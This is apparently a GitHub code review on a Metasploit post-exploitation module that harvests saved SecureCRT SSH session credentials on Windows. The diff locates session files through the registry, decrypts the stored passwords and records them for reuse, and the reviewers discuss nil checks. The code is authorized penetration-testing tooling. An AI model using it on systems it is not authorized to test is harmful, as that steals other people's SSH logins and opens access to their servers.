modules/post/windows/gather/credentials/securecrt.rb

```diff
@@ -0,0 +1,195 @@
+        return padded_plain_bytes[0..i - 1].force_encoding('UTF-16LE').encode('UTF-8')
+      end
+    end
+    print_warning('It was not possible to decode one of the v1 passwords successfully, please double check the results!')
+    return nil # We didn't decode the password successfully, so just return nil.
+  end
+
+  def securecrt_crypto_v2(ciphertext)
+    iv = ("\x00" * 16)
+    config_passphrase = datastore['PASSPHRASE'] || nil
+    key = OpenSSL::Digest::SHA256.new(config_passphrase).digest
+    aes = OpenSSL::Cipher.new('AES-256-CBC')
+    aes.key = key
+    aes.padding = 0
+    aes.decrypt
+    aes.iv = iv
+    padded_plain_bytes = aes.update([ciphertext].pack('H*'))
+    plain_bytes_length = padded_plain_bytes[0, 4].unpack1('l') # bytes to int little-endian format.
+    plain_bytes = padded_plain_bytes[4, plain_bytes_length]
+    plain_bytes_digest = padded_plain_bytes[4 + plain_bytes_length, 32]
+    if (OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verify
+      return plain_bytes.force_encoding('UTF-8')
+    end
+
+    print_warning('It seems the user set a configuration password when installing SecureCRT!')
+    print_warning('If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.')
+    return nil
+  end
+
+  def securecrt_store_config(config)
+    service_data = {
+      address: config[:hostname],
+      port: config[:port],
+      service_name: 'ssh',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: refname,
+      private_type: :password,
+      private_data: config[:password],
+      username: config[:username]
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def run
+    print_status("Gathering SecureCRT session information from #{sysinfo['Computer']}")
+    parent_key = 'HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT'
+    # get session file path
+    securecrt_path = expand_path(registry_getvaldata(parent_key, 'Config Path') + session.fs.file.separator + 'Sessions')
+    unless securecrt_path.to_s.empty?
+      result = enum_session_file(securecrt_path)
+      columns = [
+        'Filename',
+        'Hostname',
+        'Port',
+        'Username',
+        'Password',
+      ]
+      tbl = Rex::Text::Table.new(
+        'Header' => 'SecureCRT Sessions',
+        'Columns' => columns
+      )
+      result.each do |item|
+        tbl << item.values
+        config = {
+          file_name: item[:file_name],
+          hostname: item[:hostname],
+          port: item[:port].to_i,
+          username: item[:username],
+          password: item[:password]
```

Comment:
Any one of these values here could potentially be `nil`, yet it seems that this is never checked, and the code just assumes that we always grab all of these and then proceeds to go ahead and create a new credential off of this info using the `securecrt_store_config` option. We should really be assuming that we don't grab these values and then only if we manage to grab the port, the hostname/ip, the username, and the password, then we will add a credential in. Without all this information, adding a credential is a little pointless, as there isn't enough info to use it properly.

Reply:
@cn-kali-team So this was partially fixed by your addition of the `if (config[:hostname] && config[:port] && config[:username] && config[:password])`, however there are a few conditions here that could fall through the gaps, such as if `item[:port]` is `nil`, in which case the call to `.to_i` will result in `item[:port]` being set to a value of 0, which will still pass your `if` check, as 0 is not considered to equivalent to False in Ruby.

I think the best way to do this would be to use your existing statement and add some .nil? and .empty? checks to it where appropriate.

This will also deal with the case where something like `config[:hostname]` is an empty string, which is also a case that will pass this `if` statement and appear to be valid data, even though its really not.

Complicating matters is the fact that we may have some situations where fields such as `config[:password]` may legitimately be an empty string.

I'll add a new commit which should hopefully address all these issues a bit more.